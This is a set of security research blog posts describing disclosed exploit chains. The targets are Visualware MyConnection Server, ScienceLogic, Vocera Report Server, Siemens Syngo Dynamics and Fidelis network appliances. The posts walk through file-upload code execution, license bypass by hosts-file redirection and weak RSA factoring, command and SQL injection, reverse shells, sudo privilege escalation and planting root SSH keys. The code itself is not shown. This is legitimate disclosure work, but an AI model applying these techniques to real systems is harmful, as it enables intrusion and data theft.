Reading view

There are new articles available, click to refresh the page.

CVE-2021-27198

This article is in no way affiliated, sponsored, or endorsed with/by Visualware, Inc. All graphics are being displayed under fair use for the purposes of this article.

Revisiting an Old Bug: File Upload to Code Execution

A colleague recently contacted me about a bug I discovered a couple of years ago (CVE-2021-27198). The vulnerability was an unauthenticated arbitrary file upload issue in version 11.0 to 11.0b of the Visualware MyConnection Server software. At the time I hadn’t actually proven remote code execution even though I rated it as critical. So when my colleague asked me how I exploited it, I felt like I had to show it was possible. This endeavor proved to be both challenging and enlightening so I thought I’d share the experience.

The MyConnection Server software is coded in Java and intended to work seamlessly across different platforms. In this case, the arbitrary file write was privileged, granting the file server elevated permissions, with SYSTEM on Windows and root on Linux. With a privileged file write, achieving code execution is often straightforward. This post by Doyensec outlines the most common approaches, which can be broadly categorized into two groups: web application-specific and operating system-specific. Web application-specific methods involve seeking ways to initiate execution within the web server process. Examples include uploading web framework configuration files or web application source code. On the other hand, operating system-specific techniques involve finding execution triggers controlled by the operating system itself, such as services, scheduled tasks, cron jobs, and so on.

Regrettably, in the case of this particular bug, I cannot directly target the web server itself since it’s a pure Java implementation, as opposed to using a web server framework like Apache or Nginx. As a result, our focus will primarily shift towards exploring operating system-specific possibilities or more innovative approaches.

Windows RCE

With this in mind, I began researching possible techniques for achieving code execution solely through a file write. In the Windows environment, my usual strategy would involve targeting vulnerable applications susceptible to traditional DLL hijacking or phantom DLL hijacking, leveraging the privilege granted by such writes.

I opened up Sysinternals Procmon tool and began looking for “NAME NOT FOUND” or “PATH NOT FOUND” results for CreateFile. I usually look for instances of executables or DLLs. While looking through the results, I noticed that every minute the MCS java process is attempting to open several “rtaplugin” JAR files, some of which do not exist.

Based on the output, it looks like the server is dynamically loading these JARs from disk into the java process. If this is the case, I may be able to get arbitrary code execution by simply placing a custom JAR file in a specific place on the file system. I decided to open up the MCS JAR in JD-GUI to investigate.

When I searched for “rtaplugin”, I found a class named RTAPlugin that has a function that appears to load a file from disk, create a custom ClassLoader, loads a class from the file, and then creates a new instance of the class. This is exactly what I need!

To confirm execution, I created a simple POC that executes calc.exe when an instance of the class is created.

I then just manually copied the JAR into the appropriate directory to see if it was loaded. I was thrilled to see that it worked! Now I just needed to test it using the file upload vulnerability.

I loaded up Burp and pasted in the JAR file as the body of the file upload request. Unfortunately when I sent it over, I didn’t see calc.exe in the process list.

When I opened up the log file for the MyConnection server, I found the following exception was thrown when attempting to unzip the JAR.

I took the original JAR payload and diff-ed it against the one that was uploaded into the rtaplugin directory. I found that certain bytes were getting corrupted. I opened up JD-GUI again to take a closer look at the code that performed the file write.

What wasn’t immediately obvious (at least to me) was that there was an implied encoding/decoding that was happening with the calls to String.valueOf and String.getBytes. As a result, certain ranges of bytes were getting corrupted. On Windows I found that bytes between 0x80 and 0x9f were being replaced with other values. This meant I had to do some bit fiddling to get the payload to work.

After doing a little bit of googling, I found a CTF writeup by Yudai Fujiwara that faced a similar encoding problem. The writeup provided code for generating a zip file that only contained bytes in the ASCII range, 0x0 – 0x7f. The script primarily focused on two structures in the zip protocol that needed to be free of non-ascii bytes, the CRC for zipped files, and any length fields.

The script brute-forces a valid ASCII value for the CRC field by iteratively modifying the inner file. In the CTF challenge, the zip  contained an ASCII script, whereas a JAR contains a binary class file. I updated the algorithm to perform a similar modification to the Java source, and then recompile the Java class file on each iteration to make the CRC update.

Copy to Clipboard

After creating the ascii-zip payload, I uploaded it using the vulnerable endpoint. As hoped, it was loaded and executed as SYSTEM on the target server. To keep from having to recompile a JAR to execute different commands, I generated a JAR that would execute a script at a known location. I could then separately upload that script with a new command whenever I wanted command execute. I added the “setExecutable” directive to ensure it worked on Linux as well.

Linux RCE

When dealing with Linux-based operating systems, one of the primary challenges when exploiting arbitrary file write vulnerabilities is ensuring that file permissions are correctly configured. Even if a file is executed, it won’t function if it isn’t marked as executable. To overcome this obstacle, I am targeting files that already have the execute bit set.

As I had anticipated, demonstrating exploitation on Linux turned out to be quite straightforward by simply overwriting scripts within the /etc/cron.* directories. On Red Hat distributions, you can achieve relatively timely execution by overwriting the /etc/cron.hourly/0anacron script. The drawback to targeting cron jobs is there is no guarantee specific scripts exist, and overwriting them can cause system instability.

Assuming outbound network connectivity isn’t blocked, a simple reverse shell is likely the simplest payload to put in the cron job. If that doesn’t work, the cron job can be modified to contain a base64 encoded copy of the unmodified rtaplugin JAR that is then copied to the correct directory. The same technique as described above can then be used to get repeated code execution by uploading different versions of the script to/tmp/b.bat.

No License, No Wurk!

After all the effort put in to develop the rtaplugin exploit, I was disappointed to find out that rtaplugins (and the associated thread that loads them periodically) are only active when the web server has a valid license. I wasn’t aware of this because my test instance was still within its trial phase. I decided to take another look and see if our privileged file write vulnerability (CVE-2021-27198) can be used once again, but this time to trick the server into thinking it is licensed. The hope here is to find a file or database entry that can modified with our file upload exploit to bypass licensing.  I want to be sure to clarify here, nothing I will describe here can be used to subvert or crack the license for this software on a fully patched system. The goal is to use our already privileged file system access to bypass any license checks.

When you navigate to the web application home page, you’ll see a menu on the left that contains a link to “Licensing”. It’s safe to assume this is the right place to look.

Sadly, when you click on it, you’re presented with the login page. If you’re fortunate and the password for the admin user hasn’t been changed, the next page you’ll encounter is shown below.

If you’ve made it this far, or happen to guess some credentials, you will have sufficient permissions to access the server licensing endpoint. There’s not much to go on in regards to the format of the expected key other than the hint that it starts with MCS.

I opened up the JAR again and tracked down the code responsible for handling the license activation. The handler performs a series of checks and transforms before making a web request to a visualware domain to verify the license.

If that fails (by exception), the server then attempts to validate the license by sending a specially crafted DNS request.

Leveraging the privileged file write capability of CVE-2021-27198, there are several methods at my disposal for circumventing the licensing without having to decipher the licensing key directly. As the software initiates a network request to validate the entered key, it can be rerouted to a server under my control to authenticate the supplied key.

The most straightforward method to achieve this is by modifying the hosts file, a file which contains mappings of IP addresses to hostnames, and is typically the first location an operating system checks when resolving a hostname’s IP address. On Windows systems, you can find this file at C:\Windows\System32\drivers\etc\hosts, and on *nix systems, it’s located at /etc/hosts. To manipulate the license verification process, I can simply insert a new entry into the hosts file, directing the license server domain to the IP address of a server under my control.

An alternative approach, specific to *nix systems, involves altering the /etc/resolv.conf file, which specifies the DNS server’s IP address used for domain resolution. By changing the DNS server address to a server that I manage, I can ensure that any DNS requests for the license server are resolved to my fake license server’s IP address.

WARNING: It should be noted that overwriting the /etc/hosts or /etc/resolv.conf file can cause system instability if certain configurations are expected to properly resolve custom DNS entries or resolvers.

My next step is to trace back the activate function to the web endpoint that can trigger it. Unfortunately, it appears the key entered into the web form is not the same format as what is sent to the license server. After performing a couple string-based checks, a validate function is called on the provided license key. If you look at the function closely, it may look familiar. It appears to be implementing a handcrafted version of RSA.

From a security standpoint, the rationale behind requiring an encrypted license key as the input into the web application doesn’t make sense. First and foremost, since the unencrypted license key is subsequently transmitted over the network, unencrypted, it can easily be captured with a tool like Wireshark. Secondly, the actual license key is verified on the vendor’s server so deducing how the license key is generated is impractical. Unfortunately for me however, this has introduced a minor obstacle in reaching the network activation function detailed in the previous section.

The astute reader may have already noticed an interesting detail about the RSA parameters. That public key looks awful small. Just barely over 256 bits. It appears our CTF challenge continues… (oh wait this is real software).

For those imposters in the infosec community that claim playing CTF doesn’t provide real world experience, I can confidently say you’ve never hunted real bugs. All too often I come across exploit chains that appear as if someone neatly setup each primitive for me to uncover. I personally don’t spend a ton of time attempting crypto challenges when playing CTFs, mostly because I’m not smart enough. Luckily for me, this example would fit nicely into the baby’s first category. With such a small public key, I should be able to find a CTF writeup that guides me through the process of breaking it down into its two prime numbers. A few searches later I found an article by Dennis Yurichev that demonstrates using a tool called CADO-NFS to do just that. After about 5 mins I was presented with the answer.

With the two prime numbers in hand, I attempted to reconstruct the private key using the script provided in Yurichev’s post. Unfortunately, the RSA crypto libraries in python didn’t play well with the provided primes. Namely because the block size rounded up to 257 bits and it complained about truncation. I also discovered that the server’s custom RSA implementation didn’t implement padding. To get around these issues I wrote code to perform the calculations manually rather than using a crypto library.

Copy to Clipboard

I used my script to generate an encrypted blob with the derived RSA private key and fired off a web request with a finished license key. Keep in mind, since I’ve already overwritten the hosts file, I only need to pass the decryption checks as the key will not be transmitted to the vendor’s server for verification. To my delight, it works!

Conclusion

My journey to developing a working exploit for CVE-2021-27198 finally comes to an end. What started as a simple exercise turned into quite an endeavor. For anyone interested, I’ve uploaded my exploit here.

ScienceLogic Dumpster Fire

This article is in no way affiliated, sponsored, or endorsed with/by ScienceLogic, Inc. All graphics are being displayed under fair use for the purposes of this article.

Just another Day

During a penetration test for a client last year, our team identified a noteworthy target that piqued our interest. A screenshot of the website appeared in our scan findings.

After a brief investigation, we found a page that provided a clear overview of the web application’s potential function and its default credentials.

The default credentials for the phpmyadmin server on port 8008 were also provided. This detail becomes crucial later, as it grants the ability to directly modify records within the application database.

Regrettably, the system owner had not updated the default passwords, allowing us to access the system. Immediately noticeable was a menu named “Device Toolbox.” We started examining the parameters provided to these tools, as they frequently have command injection vulnerabilities due to inadequate input filtering.

After trying different payloads in the request fields, the following screen appeared as we navigated through the tool wizard.

Having demonstrated command execution, we swapped the payload for a reverse shell callback and launched it. This granted us shell access to the server. Considering the simplicity of uncovering this initial command injection vulnerability, we believed there might be more similar flaws. Now, with system access, we can observe process creation events using one of our preferred tools, Pspy. As expected, four additional command injection vulnerabilities were identified by exercising various endpoints in the web application and monitoring process creation events in Pspy. An example is illustrated below.

Having access to the file system, we proceeded to examine the web application’s source code. This would make identifying vulnerabilities simpler than through blackbox testing. However, when we tried to view the PHP files, they seemed to be indecipherable.

What about root?

Given our inability to access the web application’s source code, we shifted our focus towards pinpointing potential paths for privilege escalation to root. We uploaded and ran LinPeas on the system to identify any potential privilege escalation vulnerabilities. While LinPeas didn’t reveal anything of particular use, a copy of the sudoers file was located in one of the backup folders on the file system. It had several applications that could be executed as root, without a password, that have known privilege execution capabilities.

The find command is one of my gotos after running across this article years ago. Running the following command will execute the listed command as root on the system.

Copy to Clipboard

Having gained root privileges, we could now revisit the web application and hopefully find a way to review the source code for vulnerabilities.

Let’s briefly diverge to discuss the DMCA and the laws surrounding the circumvention of copyright protections. I bring this up because even basic encoding or encryption of source code might be viewed as a method to safeguard copyright. This could potentially hinder security researchers from examining the source code for vulnerabilities. Fortunately, Title 37 recently updated laws surrounding this topic effectively granting security researcher exception to this rule if done under the auspices of good-faith security research. Given that we are red teamers performing good-faith security research, securing our customers against critical vulnerabilities, we clearly fall under this exception.

We took a look at the PHP configuration and noticed a custom module was being used to load each source file. Analyzing the module in IDA Pro, it appears to be a simple function that decrypts the file with a static AES 256 key and then decompresses the output with zlib. Nothing fancy here.

Running this algorithm against the garbled source does the trick and we end up with normal looking PHP.

Beware what’s inside!!!

With access to the source code, we started scrutinizing it for more serious vulnerabilities. We had previously observed a command injection bug where the command was saved in the database and subsequently fetched and executed. This prompted us to search for potential SQL injection vulnerabilities, which might be escalated to remote code execution. As we examined the application endpoints, we discovered what seemed like systematic SQL injection issues. After pinpointing roughly 20 SQL injection vulnerabilities, we chose to conclude our search. A few examples are provided below.

Having identified a combined 25 command injection and SQL injection vulnerabilities we decided to stop bug hunting and reach out to the vendor to begin the disclosure process.

Vendor Disclosure & Patch

We’d love to say responsibly disclosing the vulnerabilities we discovered went smoothly, but it was easily the worst we’ve experienced. What will follow will be presented as a comical list of when responsible disclosure is probably going to go bad. In reality, all of these things happened during this one disclosure.

  • The vendor has no public vulnerability disclosure policy

  • The vendor has no security related email contacts listed on their website

  • The vendor Twitter account refuses to give you a security contact after you explain you want to disclose a security vulnerability.

  • After spamming vendor emails harvested from OSINT, the only response you get is from a random engineer. Fortunately, he forwards the email to the security director.

  • The security director refuses to accept your report, and instead points you to a portal to submit a ticket.

  • After signing up for the ticketing portal, you find that you can’t submit a ticket unless you are a customer.

  • When you notify the company that you can’t submit a ticket unless you are a customer, they tell you to have your customer submit the report.

  • When you send the report anyways, encrypted, hosted on trusted website, they refuse to open it because they claim it could be a phish.

  • Individuals from the vendor, reach out to arbitrary contacts in your customer’s organization to report you for unusual, possibly malicious behavior.

  • Upon verification of your identity by multiple individuals in your customer’s organization, they agree to open the results but go silent for  weeks.

  • You receive an email from @zerodaylaw (no seriously) saying they will be representing the vendor going forward in the disclosure process.

  • The law firm has no technical questions about the vulnerabilities themselves, but instead about behavior surrounding post-exploitation and why this software was “targeted“.

  • After multiple, unresponsive, follow-up emails with both the law firm & the vendor about coordinating with @MITREcorp to get CVEs reserved, you get an email asking to meet in person, that very week.

  • In the follow-up phone call (after declining to meet in person), the vendor claims most of the bugs were “features” or in “dead code“.

  • The primary focus on the call with the vendor is how we “got” the company’s code and not about vulnerabilities details.

  • The vendor claims that meeting the 90-day public disclosure is unlikely and given their customer base they have no estimate on when public disclosure could happen.

  • After the phone call, the vendor sends an email asking questions focused on exact times, people, authorizations, and details surrounding the vulnerability coordination with @MITREcorp

  • Lawyers from the vendor contact your customer’s organization requesting copies of all correspondence with @MITREcorp.

From the list, it’s evident that the interaction ranged from being challenging to outright hostile. However, there was a silver lining: Securifera opted to pursue the status of a CVE numbering authority (CNA). Obtaining CNA status enables an organization to reserve and disclose CVEs more conveniently.

In the last email correspondence with the vendor, nearly 9 months ago, the security director asserted that the vulnerabilities were addressed. However, they remained reluctant to proceed with CVE issuance. Considering the extensive duration that’s transpired, we opted to independently proceed with CVE issuance and disclosure. As a result, the vulnerabilities we identified are logged as CVE-2022-48580 through CVE-2022-48604. We hope the aforementioned list can act as a guide for vendors on practices to avoid in the realm of responsible vulnerability disclosure. For vendor’s looking for a good reference for how to properly run a coordinated vulnerability disclosure program, the following guide was put together to assist by the smart people at Carnegie Mellon.

Vocera Report Server Pwnage

This article is in no way affiliated, sponsored, or endorsed with/by Vocera Communications or Stryker Corporation. All graphics are being displayed under fair use for the purposes of this article.

Quest for RCE

Last year during a routine penetration test, our team came across a interesting target called Vocera Report Server while reviewing web endpoint screenshots.

A little research revealed that the “Vocera Report Server software and the associated report console interface provide administrators, managers, and decision makers the ability to monitor system performance and generate reports for analysis” for the Vocera Communication System. When we click on the “Vocera Report Console” link we are greeted with the following login page.

Step 1:  head over to Google to see if we can find any documentation that might list default credentials for the application. As luck would have it, this page comes up and kindly tells us what the default password would be.

Fortunately the system owner didn’t change the password and we log right in. Once inside we start perusing the various endpoints to get a feel for what the application is used for. Right off, the first thing that stands out is the menu that is named “Task Scheduler”. Clicking on the menu brings up a panel that appears to let you create tasks that will be executed.

After tinkering with the various tasks, it appears we can only edit existing tasks. We also can’t seem to get arbitrary command execution or injection by modifying the existing entries. At this point we decided it would likely be more fruitful to move on to a white box approach and see what the code is actually doing. We reached out to a colleague to get us access to the server using some credentials they had cracked after pulling the hash with Responder.

Since the application is written in Java, we open up the class files in JD-GUI to begin analyzing the function responsible for executing tasks. The first issue we notice is that the function that parses the user-controlled task execFileName attempts to retrieve the filename portion of the path by searching for the last occurrence of a backslash. Unfortunately in Java, forward slashes are automatically normalized into directory separators in a file path. This means we can traverse out of the intended directory.

While the path to the executable task is controllable, a check is performed that ensures that the file contains the word “java” before executing. This means if we can control the contents of a file on disk, we can execute arbitrary commands.

How then do we get a file on disk that we control? What if we can affect the log file? It looks like if an exception happens when executing the task, a log entry is created.

Sure enough, if we specify a task execfilename that doesn’t exist, an entry is created in the log file that also includes the task parameters that we can inject arbitrary data. With a little creativity, we are able to inject arbitrary commands and then point to the log file using the directory traversal to achieve remote code execution.

Can we do better?

With a path to execute arbitrary commands identified, we shifted our focus to finding a way to accomplish the same thing but without having to authenticate first. While investigating the task execution code in the previous exercise, we noticed there is a websocket interface that the web server communicates with when executing a task. After some testing it was determined that this interface was unauthenticated. In addition to the “runTaskPage” function mentioned above, there are a few other operations that appear to be related to database management functions that are worth investigating.

If we look at the code for the restoreSqlData operation we see that it executes a bat file that in turn executes another Java JAR. Inside that JAR, the function that handles the restoreSqlData operation parses the “uploadFile” parameter and appends it to the local “backupDir”. This instance is also vulnerable to directory traversal like the one mentioned previously.

The specified file is expected to be a zip file that is then programmatically unzipped and written to disk. The problem, as you could probably guess, is the unzip function is vulnerable to directory traversal which could lead to an arbitrary file write. If the unzip succeeds, a particular file is read from the archive that is then used to completely overwrite the database. DANGER: THIS OPERATION OVERWRITES THE DATABASE SO ADDITIONAL MEASURES NEED TO BE TAKEN TO PREVENT THIS. 

Since this server hosts a web server and is running as SYSTEM, an arbitrary file write can be used to achieve remote code execution by writing a webshell in the webroot. To summarize, in this instance we have found an unauthenticated endpoint that allows for a privileged file write if we can place an arbitrary file somewhere on the file system. We lack one more primitive to pull off this exploit. Back to the code!

Given the specific requirement for a file write, we search for any references to “write” and work our way back to any web endpoints that would reach that code. This concept is often referred to as source to sink data flow analysis. After some time we find a class called MultipartRequest. This class is instantiated from an incoming multipart/form-data request. If the requests contains any parameters that are named filename, the data is read and written to a file in a temp folder.

If we search for references of RequestContainer, the class responsible for creating MultipartRequest instances, we see it is created by the BaseController class on the handling of each HTTP request. Since BaseController is an abstract class, we search for any child classes and find ReportController. This is perfect since ReportController is the primary endpoint for the application. This means if we send an HTTP request with Content-Type multipart/form-data to the ReportController endpoint, the contents of any parameters with a Content-Disposition that contains a filename will be written to disk in a temp directory. This best part is this is all unauthenticated (another bug)!

Now we have all the pieces necessary to construct an exploit chain to gain unauthenticated remote code execution on the Vocera Report Server. First we construct a malicious zip file with a webshell embedded with a directory traversal path. Next we upload a zip file to the temp directory with a multipart request. Finally we send a websocket request with the restoreSqlData operation with a directory traversal path to our uploaded zip file.

WAIT!!!  HOW DO I NOT CLOBBER THE DATABASE?!?!

As much as any customer likes red teamers proving exploitation, nuking an application’s database is probably not a reasonable loss to prove code execution. That means we needed to put in a little more effort into the exploit to avoid this. If we look at the SQL restore function, we can see that if a ZipException is thrown (that is not a version issue), the function will bail out.

How then do we cause a ZipException while also successfully executing our arbitrary file write? If we look at the JDK source code for ZipInputStream we can see a simple way to cause a ZipException to be thrown from a specific ZipEntry. If we set the first bit of the flag field in the ZipEntry a ZipException will be thrown since encryption is not supported.

If we lookup the offset for LOCFLG we see it is at index 6 in the ZipEntry header. We can code up some python to modify the zip entry contents after we zip up our payload as shown below.

Copy to Clipboard

Vendor Disclosure & Patch

I reported these issues through the Stryker vulnerability disclosure program and can say everything went smoothly and they worked with us to get the issues fixed and patched in a reasonable time frame. Given the severity of these findings, we strongly encourage anyone that has Vocera Report Server deployed to update to the latest version immediately. For tracking purposes, the vulnerabilities discussed here represent CVE-2022-46898, CVE-2022-46899, CVE-2022-46900, CVE-2022-46901, and CVE-2022-46902.

Attacking .NET Web Services

This article is in no way affiliated, sponsored, or endorsed with/by Siemens Healthineers or Microsoft Corporation. All graphics are being displayed under fair use for the purposes of this article.

Last year I spent some time looking for vulnerabilities in a commercial cardiovascular imaging web application called  Syngo Dynamics. This product is developed by Siemens Healthineers. Syngo Dynamics is a rather complex application that consists of a web application, .NET web services, native binaries, and a database.

For the purposes of this blog post, I’m going to focus on the web services portion of the application. I gave a BSIDES talk on this topic for those that may prefer that format. The remainder of this post will detail my approach when performing white-box vulnerability research on a .NET web application. The first thing I like to do is open up the IIS config and any “web.config” files for the application. The IIS config can be found at “C:\Windows\System32\inetsrv\config” and the “web.config” files are typically in the app pool directories with a format similar to “<Drive Letter>\inetpub\temp\appPools\<App Name>\web.config“.

When performing white-box vulnerability research, my primary goal is to locate the code so I can look for bugs. There’s two important things we can take away from these config files to further this effort. The “application” node defines the mapping of the application endpoint to the physical path on disk where code exists. The “endpoint” node inside the “service” node specifies the class contract that defines the endpoint behavior. If we navigate to the “physicalPath” for the “DataTransferServices” we find “svc” files that describe each service.

If we look at the contents of the “CommonService.svc” file, we can see that the assembly that implements this service is called DataTransferServices and the service name is DataTransferServices.CommonService. At this point we need to locate the assembly to begin the reverse engineering process. But what is an assembly?

So we’re looking for an assembly named “DataTransferServices.exe.” or “DataTransferServices.dll” likely in the same directory tree. If we do a quick search in explorer we find what we are looking for.

Now that the assembly has been located, it’s time to open up the binary in a decompiler. Since the binary is a managed C# assembly, we can decompile it back into readable C# code. There are two tools I like to use for this, dotPeek & dnSpy. They are mostly feature equivalent with the exception of dotPeek also providing debugging capabilities.

Opening up the “DataTransferServices.dll” binary we find the contract interface that defines the functions that are exposed through the service. From dnSpy we select “Go to Implementation” to view the code for one of the functions.

One of the first things that jumped out to me is the concatenation of user controlled parameters for the file path that is then read and returned in the response. Praetorian wrote up an interesting article about abusing the Path.Combine function in C# . Basically, if an absolute path is given as one of the parameters to concatenate, the others are ignored. To confirm this suspicion, I needed to craft a web request to hit this code. The first thing I did was navigate to the service endpoint in a browser to see what it displayed.

It looks like the metadata output is disabled. Unfortunately without metadata output enabled we won’t be able to easily generate sample web requests for the web service endpoints. Luckily the webpage tells us how to enable it inside the “web.config” file for the web service. After making the modification we are greeted with a slightly different landing page.

The service endpoint shows a link to a new “wsdl” endpoint that describes the functions published by the service. Unfortunately without something to ingest, the “wsdl” XML file it isn’t very useful. Fortunately, Burp has an extension called Wsdler that was made for this very purpose. If we navigate to the “wsdl” endpoint we can then right click on the request in the Burp Proxy -> HTTP history tab and send it to the Wsdler extension.

Using Wsdler you can select the operation in the list and it will generate a sample HTTP SOAP request. The request can then be sent to the Repeater tab to test out. I enter the full path in the “fileName” field to confirm the ability to read arbitrary files using the Path.Combine function.

Our suspicious was correct. We successfully read an arbitrary file rather than files in the intended directory. Often times it isn’t this simple and having the ability to debug the code is pivotal. In the next section, I’ll walk through how to do that using dnSpy.

Debugging .NET web services using dnSpy and dotPeek

To begin debugging a .NET web service, we need to locate the IIS w3wp.exe process. Click the Debug-> Attach to Process menu in dnSpy to bring up the process selection dialog. If no w3wp.exe process exists, send a web request to the web service to ensure a work process is created.

If the w3wp.exe process still isn’t listed, there could be an architecture mismatch either between the dnSpy application or the IIS server process. It is important to ensure the architecture of dnSpy, the .NET assembly, and the IIS server process are all the same. The architecture of the IIS process can be modified in the Advanced Settings of the IIS Application Pool.

Once you attach to the w3wp.exe process you should be able to drop breakpoints in the decompiled source that will get hit when the code executes. If you drop a breakpoint and the circle is an outline rather than filled-in, you have one more step to complete. This means that the debugger could not find symbols for the application you are debugging.

In this case we can use dotPeek to generate the symbols for the assembly. Simply open the assembly in dotPeek, right click on the assembly in the “Assembly Explorer” and click Generate Pdb.

After the PDB has been generated, copy the file into the same directory as the assembly that is being debugged and it should be automatically loaded. Restart the debugger and begin stepping through the code.

As shown in the screenshot above, I can confirm at the code level using the debugger that Path.Combine does indeed allow for the opening of arbitrary file paths if one of the arguments is absolute.

Finding Variants

With the discovery of one misuse of the Path.Combine function resulting in an arbitrary file read, it makes sense to search the rest of the code base for additional instances that may have more impact. Since this vulnerability isn’t particularly complex, I chose to use grepWin to search for other uses of Path.Combine who’s arguments may be controllable.

Reviewing the results led to the discovery of a similar usage of Path.Combine but this time as a file write. The impact of an arbitrary file write is often more critical as it typically allows for code execution.

Ultimately an additional 7 instances of exploitable insecure Path.Combine usage were identified. These findings fell into three vulnerability categories, arbitrary file read, arbitrary file write, & server side request forgery (SSRF). I will leave exploitation of these vulnerability types as an exercise for the reader as this is a pretty well documented topic. For some examples feel free to watch my BSIDES Charleston 2022 talk.

Vendor Disclosure & Patch

I reported these issues through the Siemens Healthineers vulnerability disclosure process and can say everything went smoothly and they worked with me to get the issues fixed and patched in a reasonable time frame. Given the severity of these findings, we strongly encourage anyone that has Syngo Dynamics deployed to update to the latest version immediately. More details about the vulnerabilities can be found on the Siemens Healthineers security advisory page.

Operation Eagle Eye

This article is in no way affiliated, sponsored, or endorsed with/by Fidelis Cybersecurity. All graphics are being displayed under fair use for the purposes of this article.

Operation Eagle Eye

Who remembers that movie about 15 years ago called Eagle Eye? A supercomputer has access to massive amounts of data, introduce AI, things go to crap. Reflecting back on that movie, I find myself more interested in what a hacker could actually do with that kind of access rather than the AI bit. This post is about what I did when I got that kind of access on a customer red team engagement.

Being a network defender is hard. Constantly trying to balance usability, security, and privacy. Add too much security and users complain they can’t get their job done. Not enough and you open yourself up to being hacked by every script kiddie on the internet. How does user privacy fit in? Well, as a network defender your first grand idea to protect the network against adversaries might be to implement some form of network traffic inspection. This might have worked 20 years ago, but now most network protocols at least support some form of encryption to protect users’ data from prying eyes. If only there was a way to decrypt it, inspect it, and then encrypt it back… Let’s call it break and inspect.

The graphic above was pulled from an article from the NSA, warning about break and inspect and the risks introduced with its usage (I’d be inclined to heed the warning since the NSA are likely experts on this particular topic). The most obvious risk introduced by break-and-inspect is clearly the device(s) performing the decryption and inspection. Compromise of these devices would provide an attacker access to all unencrypted traffic traversing the network.

All of this lead-up was meant to describe what I can only assume happened with one of our customers. After years of assessments, I noticed one day that all outbound web traffic now had a custom CA certificate when visiting websites. This was a somewhat natural progression as we had been utilizing domain fronting for some time to evade network detection. In response, the network defenders implemented break-and-inspect to identify traffic with  conflicting HTTP Host headers. As a red teamer, my almost immediate thought was, What if we could get access to the break-and-inspect device? Being able to sift through all unencrypted web traffic on a large network would be a goldmine. Operation Eagle Eye began…

Enumeration

After no small amount of time, we identified what we believed to be the device(s) responsible for performing the break-and-inspect operation on the network. We found the BigIP F5 device that was listed as the hostname on the CA certificate, a Fidelis Network CommandPost, and several HP iLO management web services in the same subnet. For those that aren’t familiar, Fidelis Cybersecurity sells a network appliance suite that can perform traffic inspection and modification. They also just so happen to be listed as an accredited product on the NSA recommended National Information Assurance Partnership (NIAP) website so I assume it’s super-secure-hackproof 😉

First order of business was to do some basic enumeration of the devices in this network segment. The F5’s had been recently updated just after a recent RCE bug had been released so I moved on. The Fidelis CommandPost web application presented a CAS based login portal on the root URL as seen below.

After some minimal research on CAS and what appeared to be a rather mature and widely used authentication library, I decided to start brute forcing endpoints with dirsearch on the CommandPost web application. While that was running I moved on to the HP iLOs to see what we had there.

The first thing that jumped out to me about this particular iLO endpoint was that it was HP and the version displayed was under 2.53. This is interesting because a heap-based BOF vulnerability (CVE-2017-12542) was discovered a few years back that can be exploited to create a new privileged user.

Exploitation – HP iLO (CVE-2017-12542)

While my scanner was still enumerating endpoints on the CommandPost,  I went ahead and fired up the iLO exploit to confirm whether or not the target was actually exploitable. Sure enough, I was able to create a new admin user and login.

We now have privileged access to an iLO web management portal of some unknown web server. Outside of getting some server statistics and being able to turn the server on and off, what can we actually do that’s useful from an attacker’s perspective? Well for one we can utilize the remote console feature. HP iLOs actually have two ways to do this, one via Java web start from the web interface and one over SSH (which shares the credentials for the web interface).

Loading up the remote console via Java for this iLO reveals that this server is actually a Fidelis Direct Sensor appliance. Access to the remote console in itself is not super useful since you still have to have credentials to login to the server. However, when you bring up the Java web start remote console you’ll notice a menu that says “Virtual Drives”. What this menu allows you to do is to remotely mount an ISO of your choosing.

The ability to mount a custom ISO remotely introduces a possible avenue for code execution. If the target server does not have a BIOS password and doesn’t utilize full disk encryption, we should be able to boot to an ISO we supply remotely and gain access to the server’s file system. This technique definitely isn’t subtle as we have to turn off the server, but maybe the system owner won’t notice if the outage is brief 🙂

If you are reading this there’s a good chance you’ll be attempting to pull this off through some sort of proxy/C2 comms mid-operation rather than physically sitting at a system on the same network. This makes the choice of ISO critical since network bandwidth is limited. A live CD image that is as small as possible is ideal. I originally tried a 30MB TinyCore linux but eventually landed on the 300 MB Puppy Linux since it comes with a lot more features out-of-the-box. Once the OS loaded up, I mounted the filesystem and confirmed access to critical files.

Since the device had SSH enabled, I decided the easiest mechanism for compromise would be to simply add a SSH public key to the root user’s authorized key file. The “sshd_config” also needed to be updated to allow root login and enable public key authentication.

Exploitation – Unauthenticated Remote Command Injection (CVE-2021-35047)

After gaining initial access to the Fidelis Direct sensor appliance via SSH, I began poking around at the services hosted on the device and investigating what other systems it was communicating with. One of the first things I noticed was lots of connections back to the Fidelis CommandPost appliance on port 5556 from a rconfigc process. I also noticed a rconfigd process listening on the sensor, my assumption was this was some kind of peer-to-peer client/server setup.

Analyzing the rconfigc/rconfigd binaries revealed they were a custom remote script execution framework. The framework consisted of a simple TLS-based client/server application backed mostly by Perl scripts at varying privilege levels, utilizing hard-coded authentication. I reviewed a couple of these scripts and came across the following code snippet.

If you haven’t spotted the bug here, those back ticks in Perl mean to execute the command in the background. Since there are no checks sanitizing the incoming input for the user variable, additional commands can be executed by simply adding a single quote and a semicolon. It appears another perk to this particular command is that it is being run as root so we have automatic privilege escalation. I decided to test this remotely on the Fidelis CommandPost to confirm it actually worked.

Exploitation – Unauthenticated Remote SQL injection (CVE-2021-35048)

Circling back around to the Fidelis CommandPost web application, my dirsearch brute forcing had revealed some interesting endpoints worth investigating. While the majority required authentication, I found two that accepted XML that did not. After trying several different payloads, I managed to get a SQL error returned in the output from one of the requests.

Exploitation – Insecure Credential Storage (CVE-2021-35050)

Using the SQL injection vulnerability identified above, I proceeded to dump the CommandPost database. My goal was to find a way to authenticate to the web application. What I found was a table that stored entries referred to as UIDs. These hex encoded strings turned out to be a product of a reversible encryption mechanism over a string created by concatenating a username and password. Decrypting this value would return credentials that could then be used to login to the Fidelis web application.

Exploitation – Authenticated Remote Command Injection (CVE-2021-35049)

With decrypted root credentials from the database, I authenticated to the web application and began searching for new vulnerabilities in the expanded scope. After a little bit of fuzzing, and help from my previous access, I identified a command injection vulnerability that could be triggered from the web application.

Chaining this vulnerability with each of the previous bugs I was able to create an exploit that could execute root level commands across any managed Fidelis device from an unauthenticated CommandPost web session.

The DATA

So here we are, root level access to a suite of tools that captures and modifies network traffic across an enterprise. It was now time to switch gears and begin investigating what functionality these devices provided and how it could be abused by an attacker (post-compromise risk assessment). After navigating through the CommandPost web application endpoints and performing some minimal system enumeration on the devices, I felt like I had a handle on how the systems work together. There are 3 device types, CommandPost, Sensors, & Collectors. The Sensors collect, inspect, and modify traffic. The Collectors store the data, and the CommandPost provides the web interface for managing the devices.

